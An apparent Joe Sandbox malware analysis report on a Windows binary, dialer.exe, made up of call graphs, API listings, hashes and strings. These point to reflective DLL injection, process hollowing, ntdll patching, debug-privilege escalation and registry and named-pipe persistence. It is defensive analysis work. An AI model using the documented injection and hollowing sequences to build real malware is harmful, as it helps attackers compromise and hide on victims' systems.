427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap HeapFree GetProcessHeap HeapFree 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 
481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 
ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 
615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b 
GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                • API String ID: 2561231171-3753927220
                                                                                • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                                                Control-flow Graph

